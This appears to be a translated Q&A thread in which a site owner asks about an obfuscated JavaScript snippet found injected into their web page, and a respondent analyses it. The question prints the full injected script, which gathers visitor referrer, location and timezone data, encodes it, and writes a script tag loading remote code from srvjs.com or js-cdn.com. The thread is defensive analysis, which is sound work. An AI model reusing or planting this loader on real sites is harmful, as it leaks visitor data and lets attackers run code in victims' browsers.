关于此javascript代码,我有几个问题,我发现在我的一个网页中注入了该代码。或混淆该脚本?
我如何学习此脚本的工作? :


错误解压缩脚本:意外令牌{


(function(){function x(){var b=K(),a;for(a in b){var m=b[a],c;c=m;if(6!==c.length)c=!1;else{var d;d=c.match(/^[a-z0-9]+$/)?!0:!1;if(d){c=c.split("");for(index=d=0;index<c.length;++index)d+=c[index].charCodeAt(0);c=465!==d?!1:!0}else c=!1}if(c&&("undefined"===typeof disable_override||!disable_override))return m}return"gie462"}function K(){for(var b,a=/\+/g,m=/([^&=]+)=?([^&]*)/g,c=function(b){b=b.replace(a," ");var c;a:{c=b;var d="%20 %21 %22 %23 %24 %25 %26 %27 %28 %29 %2A %2B %2C %2D %2E %2F %3A %3B %3C %3D %3E %3F %40 %5B %5C %5D %5E %5F %7B %7C %7D %7E %60".split(" ");
    for(i=0;i<d.length;i++)if(-1!==c.indexOf(d[i])){c=!0;break a}c=!1}return c?decodeURIComponent(b):b},d=window.location.search.substring(1),e={};b=m.exec(d);)e[c(b[1])]=c(b[2]);return e}function q(){for(var b=document.getElementsByTagName("script"),a=0;a<b.length;a++)if(-1!=b[a].src.indexOf("gie462"))return b[a]}function H(b){return String.fromCharCode.apply(null,arguments)}var l={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",lookup:null,ie:/MSIE /.test(navigator.userAgent),
    ieo:/MSIE [67]/.test(navigator.userAgent),encode:function(b){b=l.toUtf8(b);var a=-1,m=b.length,c,d,e=[,,,];if(l.ie){for(var r=[];++a<m;)c=b[a],d=b[++a],e[0]=c>>2,e[1]=(c&3)<<4|d>>4,isNaN(d)?e[2]=e[3]=64:(c=b[++a],e[2]=(d&15)<<2|c>>6,e[3]=isNaN(c)?64:c&63),r.push(l.alphabet.charAt(e[0]),l.alphabet.charAt(e[1]),l.alphabet.charAt(e[2]),l.alphabet.charAt(e[3]));return r.join("")}for(r="";++a<m;)c=b[a],d=b[++a],e[0]=c>>2,e[1]=(c&3)<<4|d>>4,isNaN(d)?e[2]=e[3]=64:(c=b[++a],e[2]=(d&15)<<2|c>>6,e[3]=isNaN(c)?
        64:c&63),r+=l.alphabet[e[0]]+l.alphabet[e[1]]+l.alphabet[e[2]]+l.alphabet[e[3]];return r},decode:function(b){if(b.length%4)throw Error("decode failed.");b=l.fromUtf8(b);var a=0,m=b.length;if(l.ieo){for(var c=[];a<m;)128>b[a]?c.push(String.fromCharCode(b[a++])):191<b[a]&&224>b[a]?c.push(String.fromCharCode((b[a++]&31)<<6|b[a++]&63)):c.push(String.fromCharCode((b[a++]&15)<<12|(b[a++]&63)<<6|b[a++]&63));return c.join("")}for(c="";a<m;)c=128>b[a]?c+String.fromCharCode(b[a++]):191<b[a]&&224>b[a]?c+String.fromCharCode((b[a++]&
        31)<<6|b[a++]&63):c+String.fromCharCode((b[a++]&15)<<12|(b[a++]&63)<<6|b[a++]&63);return c},toUtf8:function(b){var a=-1,m=b.length,c,d=[];if(/^[\x00-\x7f]*$/.test(b))for(;++a<m;)d.push(b.charCodeAt(a));else for(;++a<m;)c=b.charCodeAt(a),128>c?d.push(c):2048>c?d.push(c>>6|192,c&63|128):d.push(c>>12|224,c>>6&63|128,c&63|128);return d},fromUtf8:function(b){var a=-1,m,c=[],d=[,,,];if(!l.lookup){m=l.alphabet.length;for(l.lookup={};++a<m;)l.lookup[l.alphabet.charAt(a)]=a;a=-1}for(m=b.length;++a<m;){d[0]=
        l.lookup[b.charAt(a)];d[1]=l.lookup[b.charAt(++a)];c.push(d[0]<<2|d[1]>>4);d[2]=l.lookup[b.charAt(++a)];if(64==d[2])break;c.push((d[1]&15)<<4|d[2]>>2);d[3]=l.lookup[b.charAt(++a)];if(64==d[3])break;c.push((d[2]&3)<<6|d[3])}return c}};(function(){function b(a,c){function e(g){if(e[g]!==w)return e[g];var h;if("bug-string-char-index"==g)h=!1;else if("json"==g)h=e("json-stringify")&&e("json-parse");else{var a;if("json-stringify"==g){h=c.stringify;var b="function"==typeof h&&t;if(b){(a=function(){return 1}).toJSON=
    a;try{b="0"===h(0)&&"0"===h(new l)&&'""'==h(new x)&&h(u)===w&&h(w)===w&&h()===w&&"1"===h(a)&&"[1]"==h([a])&&"[null]"==h([w])&&"null"==h(null)&&"[null,null,null]"==h([w,u,null])&&'{"a":[1,true,false,null,"\u0000\b\n\f\r\t"]}'==h({a:[a,!0,!1,null,"\x00\b\n\f\r\t"]})&&"1"===h(null,a)&&"[\n 1,\n 2\n]"==h([1,2],null,1)&&'"-271821-04-20T00:00:00.000Z"'==h(new q(-864E13))&&'"+275760-09-13T00:00:00.000Z"'==h(new q(864E13))&&'"-000001-01-01T00:00:00.000Z"'==h(new q(-621987552E5))&&'"1969-12-31T23:59:59.999Z"'==
    h(new q(-1))}catch(d){b=!1}}h=b}if("json-parse"==g){h=c.parse;if("function"==typeof h)try{if(0===h("0")&&!h(!1)){a=h('{"a":[1,true,false,null,"\u0000\b\n\f\r\t"]}');var B=5==a.a.length&&1===a.a[0];if(B){try{B=!h('"\t"')}catch(d){}if(B)try{B=1!==h("01")}catch(d){}if(B)try{B=1!==h("1.")}catch(d){}}}}catch(d){B=!1}h=B}}return e[g]=!!h}a||(a=d.Object());c||(c=d.Object());var l=a.Number||d.Number,x=a.String||d.String,r=a.Object||d.Object,q=a.Date||d.Date,E=a.SyntaxError||d.SyntaxError,H=a.TypeError||
    d.TypeError,K=a.Math||d.Math,I=a.JSON||d.JSON;"object"==typeof I&&I&&(c.stringify=I.stringify,c.parse=I.parse);var r=r.prototype,u=r.toString,v,D,w,t=new q(-0xc782b5b800cec);try{t=-109252==t.getUTCFullYear()&&0===t.getUTCMonth()&&1===t.getUTCDate()&&10==t.getUTCHours()&&37==t.getUTCMinutes()&&6==t.getUTCSeconds()&&708==t.getUTCMilliseconds()}catch(g){}if(!e("json")){var F=e("bug-string-char-index");if(!t)var y=K.floor,Q=[0,31,59,90,120,151,181,212,243,273,304,334],G=function(g,h){return Q[h]+365*
    (g-1970)+y((g-1969+(h=+(1<h)))/4)-y((g-1901+h)/100)+y((g-1601+h)/400)};(v=r.hasOwnProperty)||(v=function(g){var h={},a;(h.__proto__=null,h.__proto__={toString:1},h).toString!=u?v=function(g){var a=this.__proto__;g=g in(this.__proto__=null,this);this.__proto__=a;return g}:(a=h.constructor,v=function(g){var h=(this.constructor||a).prototype;return g in this&&!(g in h&&this[g]===h[g])});h=null;return v.call(this,g)});D=function(g,a){var c=0,b,d,f;(b=function(){this.valueOf=0}).prototype.valueOf=0;d=
    new b;for(f in d)v.call(d,f)&&c++;b=d=null;c?D=2==c?function(g,a){var h={},c="[object Function]"==u.call(g),b;for(b in g)c&&"prototype"==b||v.call(h,b)||!(h[b]=1)||!v.call(g,b)||a(b)}:function(g,a){var h="[object Function]"==u.call(g),b,c;for(b in g)h&&"prototype"==b||!v.call(g,b)||(c="constructor"===b)||a(b);(c||v.call(g,b="constructor"))&&a(b)}:(d="valueOf toString toLocaleString propertyIsEnumerable isPrototypeOf hasOwnProperty constructor".split(" "),D=function(g,a){var h="[object Function]"==
    u.call(g),b,c=!h&&"function"!=typeof g.constructor&&m[typeof g.hasOwnProperty]&&g.hasOwnProperty||v;for(b in g)h&&"prototype"==b||!c.call(g,b)||a(b);for(h=d.length;b=d[--h];c.call(g,b)&&a(b));});return D(g,a)};if(!e("json-stringify")){var R={92:"\\",34:'\"',8:"\b",12:"\f",10:"\n",13:"\r",9:"\t"},z=function(g,a){return("000000"+(a||0)).slice(-g)},N=function(g){for(var a='"',b=0,c=g.length,d=!F||10<c,f=d&&(F?g.split(""):g);b<c;b++){var k=g.charCodeAt(b);switch(k){case 8:case 9:case 10:case 12:case 13:case 34:case 92:a+=
    R[k];break;default:a=32>k?a+("\u00"+z(2,k.toString(16))):a+(d?f[b]:g.charAt(b))}}return a+'"'},L=function(g,a,b,c,d,f,k){var e,p,l,m,n,q,r,t,A;try{e=a[g]}catch(x){}if("object"==typeof e&&e)if(p=u.call(e),"[object Date]"!=p||v.call(e,"toJSON"))"function"==typeof e.toJSON&&("[object Number]"!=p&&"[object String]"!=p&&"[object Array]"!=p||v.call(e,"toJSON"))&&(e=e.toJSON(g));else if(e>-1/0&&e<1/0){if(G){m=y(e/864E5);for(p=y(m/365.2425)+1970-1;G(p+1,0)<=m;p++);for(l=y((m-G(p,0))/30.42);G(p,l+1)<=m;l++);
    m=1+m-G(p,l);n=(e%864E5+864E5)%864E5;q=y(n/36E5)%24;r=y(n/6E4)%60;t=y(n/1E3)%60;n%=1E3}else p=e.getUTCFullYear(),l=e.getUTCMonth(),m=e.getUTCDate(),q=e.getUTCHours(),r=e.getUTCMinutes(),t=e.getUTCSeconds(),n=e.getUTCMilliseconds();e=(0>=p||1E4<=p?(0>p?"-":"+")+z(6,0>p?-p:p):z(4,p))+"-"+z(2,l+1)+"-"+z(2,m)+"T"+z(2,q)+":"+z(2,r)+":"+z(2,t)+"."+z(3,n)+"Z"}else e=null;b&&(e=b.call(a,g,e));if(null===e)return"null";p=u.call(e);if("[object Boolean]"==p)return""+e;if("[object Number]"==p)return e>-1/0&&e<
1/0?""+e:"null";if("[object String]"==p)return N(""+e);if("object"==typeof e){for(g=k.length;g--;)if(k[g]===e)throw H();k.push(e);A=[];a=f;f+=d;if("[object Array]"==p){l=0;for(g=e.length;l<g;l++)p=L(l,e,b,c,d,f,k),A.push(p===w?"null":p);g=A.length?d?"[\n"+f+A.join(",\n"+f)+"\n"+a+"]":"["+A.join(",")+"]":"[]"}else D(c||e,function(g){var a=L(g,e,b,c,d,f,k);a!==w&&A.push(N(g)+":"+(d?" ":"")+a)}),g=A.length?d?"{\n"+f+A.join(",\n"+f)+"\n"+a+"}":"{"+A.join(",")+"}":"{}";k.pop();return g}};c.stringify=function(g,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             a,b){var c,e,d,f;if(m[typeof a]&&a)if("[object Function]"==(f=u.call(a)))e=a;else if("[object Array]"==f){d={};for(var l=0,p=a.length,n;l<p;n=a[l++],(f=u.call(n),"[object String]"==f||"[object Number]"==f)&&(d[n]=1));}if(b)if("[object Number]"==(f=u.call(b))){if(0<(b-=b%1))for(c="",10<b&&(b=10);c.length<b;c+=" ");}else"[object String]"==f&&(c=10>=b.length?b:b.slice(0,10));return L("",(n={},n[""]=g,n),e,d,c,"",[])}}if(!e("json-parse")){var S=x.fromCharCode,T={92:"\",34:'"',47:"/",98:"\b",116:"\t",
    110:"\n",102:"\f",114:"\r"},f,J,n=function(){f=J=null;throw E();},C=function(){for(var a=J,b=a.length,c,e,d,l,k;f<b;)switch(k=a.charCodeAt(f),k){case 9:case 10:case 13:case 32:f++;break;case 123:case 125:case 91:case 93:case 58:case 44:return c=F?a.charAt(f):a[f],f++,c;case 34:c="@";for(f++;f<b;)if(k=a.charCodeAt(f),32>k)n();else if(92==k)switch(k=a.charCodeAt(++f),k){case 92:case 34:case 47:case 98:case 116:case 110:case 102:case 114:c+=T[k];f++;break;case 117:e=++f;for(d=f+4;f<d;f++)k=a.charCodeAt(f),
48<=k&&57>=k||97<=k&&102>=k||65<=k&&70>=k||n();c+=S("0x"+a.slice(e,f));break;default:n()}else{if(34==k)break;k=a.charCodeAt(f);for(e=f;32<=k&&92!=k&&34!=k;)k=a.charCodeAt(++f);c+=a.slice(e,f)}if(34==a.charCodeAt(f))return f++,c;n();default:e=f;45==k&&(l=!0,k=a.charCodeAt(++f));if(48<=k&&57>=k){for(48==k&&(k=a.charCodeAt(f+1),48<=k&&57>=k)&&n();f<b&&(k=a.charCodeAt(f),48<=k&&57>=k);f++);if(46==a.charCodeAt(f)){for(d=++f;d<b&&(k=a.charCodeAt(d),48<=k&&57>=k);d++);d==f&&n();f=d}k=a.charCodeAt(f);if(101==
    k||69==k){k=a.charCodeAt(++f);43!=k&&45!=k||f++;for(d=f;d<b&&(k=a.charCodeAt(d),48<=k&&57>=k);d++);d==f&&n();f=d}return+a.slice(e,f)}l&&n();if("true"==a.slice(f,f+4))return f+=4,!0;if("false"==a.slice(f,f+5))return f+=5,!1;if("null"==a.slice(f,f+4))return f+=4,null;n()}return"$"},M=function(a){var b,c;"$"==a&&n();if("string"==typeof a){if("@"==(F?a.charAt(0):a[0]))return a.slice(1);if("["==a){for(b=[];;c||(c=!0)){a=C();if("]"==a)break;c&&(","==a?(a=C(),"]"==a&&n()):n());","==a&&n();b.push(M(a))}return b}if("{"==
    a){for(b={};;c||(c=!0)){a=C();if("}"==a)break;c&&(","==a?(a=C(),"}"==a&&n()):n());","!=a&&"string"==typeof a&&"@"==(F?a.charAt(0):a[0])&&":"==C()||n();b[a.slice(1)]=M(C())}return b}n()}return a},P=function(a,b,c){c=O(a,b,c);c===w?delete a[b]:a[b]=c},O=function(a,b,c){var d=a[b],e;if("object"==typeof d&&d)if("[object Array]"==u.call(d))for(e=d.length;e--;)P(d,e,c);else D(d,function(a){P(d,a,c)});return c.call(a,b,d)};c.parse=function(a,b){var c,d;f=0;J=""+a;c=M(C());"$"!=C()&&n();f=J=null;return b&&
"[object Function]"==u.call(b)?O((d={},d[""]=c,d),"",b):c}}}c.runInContext=b;return c}var a="function"===typeof define&&define.amd,m={"function":!0,object:!0},c=m[typeof exports]&&exports&&!exports.nodeType&&exports,d=m[typeof window]&&window||this,e=c&&m[typeof module]&&module&&!module.nodeType&&"object"==typeof global&&global;!e||e.global!==e&&e.window!==e&&e.self!==e||(d=e);if(c&&!a)b(d,c);else{var l=d.JSON,x=d.JSON3,q=!1,E=b(d,d.JSON3={noConflict:function(){q||(q=!0,d.JSON=l,d.JSON3=x,l=x=null);
    return E}});d.JSON={parse:E.parse,stringify:E.stringify}}a&&define(function(){return E})}).call(this);(function(){var b=x(),a=(new Date).getTimezoneOffset()/-1,m=Math.floor(9999999*Math.random()+1E4),c=document.referrer,d=window.location.toString(),e;e=(e=/\?cr=([^&]+)/.exec(q().src))?l.decode(e[1]):"";b="?d="+l.encode(JSON.stringify({k:b,b:a,c:m,r:c,s:d,cr:e}));a=q().src;a=-1<a.indexOf("//")?a.split("/")[2]:a.split("/")[0];a=a.split(":")[0];a="//"+(a?a:H(106,115,45,99,100,110,46,99,111,109))+H(47,
        105,109,112,47)+x()+".js";document.write('<script src="'+(a+b)+'">\x3c/script>')})()})();


评论

服务器中是否有任何gie462.js?

是的,srvjs.com/js/gie462.js,它已使用脚本src嵌入到html文件中。

#1 楼

1.

该脚本在末尾写入一个<script src=...>标记,因此要知道它在做什么,您可以将最后一个document.write更改为console.log或其他除垢措施,以将其写出: br />
<script src="//srvjs.com/imp/gie462.js?d=«base64»"></script>


访问该URL将显示“糟糕,好像出了点问题”。以HTML格式编写,因此我想脚本目前已被停用,或者我没有传递正确的参数。

如果脚本是用相对路径而不是srvjs.com加载的,则主机将改为js-cdn.com。仔细阅读js-cdn.com的博客帖子,表明该网站与2015年的欺诈活动有关。

请注意,srvjs.com/imp/gie462.jsjs-cdn.com/imp/gie462.js返回的内容相同,因此这两个网站应密切相关。

2.

混淆不大,我认为您的拆包质量不是很好。我只是使用VS Code的美化工具来实现的。


var l = {alphabet: ...}部分是来自https://stackoverflow.com/a/24133397/224671(o_O)的base64编码库,function() { ... }.call(this)接下来是JSON3。

发送的base64数据可以看作是:真实脚本(imp/gie462.js)。在真实脚本中完成的操作尚不清楚。



更新2016年11月7日:该脚本现已启动,当前仅重定向到http:// google。 com时未提供任何参数,因此可能仍处于测试阶段。

评论


从....一直以来,浏览器都支持base64和JSON。尤其是IE8。

– John Dvorak
16年11月6日在7:54

您知道为什么要使用自定义base64或json库吗?

–托马斯·库尔森
16年11月6日在15:05

@ThomasCoulson我想增加覆盖范围。借助自定义库,它们还可以针对IE 6或7等古老的浏览器。

–kennytm
16年11月6日在15:07